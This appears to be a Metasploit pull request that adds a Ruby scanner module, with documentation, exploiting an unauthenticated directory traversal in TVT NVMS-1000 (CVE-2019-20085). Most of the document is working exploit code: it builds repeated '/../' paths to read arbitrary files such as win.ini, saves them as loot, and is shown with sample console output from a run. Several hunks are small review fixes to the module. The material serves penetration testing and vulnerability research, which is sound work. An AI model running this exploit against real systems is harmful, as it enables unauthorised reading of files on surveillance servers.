### PR TITLE
NVMS 1000 Unauthenticated Directory Traversal

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/tvt_nvms_traversal.md
@@ -1,0 +1,34 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability which exists in TVT network surveillance management software-1000 version 3.4.1. NVMS listens by default on port 80.
+
+### Vulnerable Application
+
+* http://en.tvt.net.cn/upload/service/NVMS1000.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/tvt_nvms_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Windows 7 SP1
+
+```
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
+RHOSTS => 192.168.43.152
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run
+
+[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
+```
+
+## References
+
+* https://www.exploit-db.com/exploits/47774
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20085

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -45,7 +45,6 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = '/../' * datastore['DEPTH'] + filename
-    uri = "#{traversal}"
 
     res = send_request_raw({
       'method' => 'GET',

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
 
     res = send_request_raw({
       'method' => 'GET',
-      'uri'    => uri
+      'uri'    => normalize_uri(traversal)
     })
 
     unless res && res.code == 200

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Auxiliary
       return
     end
 
-    vprint_good("#{peer} - #{res.body}")
+    print_good("#{peer} - Downloaded #{res.body.length} bytes")
     path = store_loot(
       'nvms.traversal',
       'text/plain',

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -39,10 +39,6 @@ class MetasploitModule < Msf::Auxiliary
       ])
   end
 
-  def data
-    Rex::Text.rand_text_alpha(3..8)
-  end
-
   def run_host(ip)
     filename = datastore['FILEPATH']
     traversal = '/../' * datastore['DEPTH'] + filename

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     filename = datastore['FILEPATH']
-    traversal = "#{"/../" * datastore['DEPTH']}#{filename}"
+    traversal = '/../' * datastore['DEPTH'] + filename
     uri = "#{traversal}"
 
     res = send_request_raw({

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -34,6 +34,7 @@ class MetasploitModule < Msf::Auxiliary
       [
         Opt::RPORT(80),
         OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+        OptString.new('TARGETURI', [true, "The base URI path of nvms", '/']),
         OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
       ])
   end

--- a/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
+++ b/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb
@@ -1,0 +1,70 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'TVT NVMS-1000 Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability which
+        exists in TVT network surveillance management software-1000 version 3.4.1.
+        NVMS listens by default on port 80.
+      },
+      'References'  =>
+        [
+          ['CVE', '2019-20085'],
+          ['EDB', '47774']
+        ],
+      'Author'      =>
+        [
+          'Numan Türle', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => '2019-12-12',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def data
+    Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "#{"/../" * datastore['DEPTH']}#{filename}"
+    uri = "#{traversal}"
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'nvms.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end


### PR DESCRIPTION
## Summary 
```
This module exploits an unauthenticated directory traversal vulnerability which 
exists in TVT network surveillance management software-1000 version 3.4.1.
```

## Example
```
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS 192.168.43.152
RHOSTS => 192.168.43.152
msf5 auxiliary(scanner/http/tvt_nvms_traversal) > run

[+] File saved in: /root/.msf4/loot/20191230124941_default_192.168.43.152_nvms.traversal_240600.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tvt_nvms_traversal) >
```

### Vulnerable Application & References
* http://en.tvt.net.cn/upload/service/NVMS1000.zip
* https://www.exploit-db.com/exploits/47774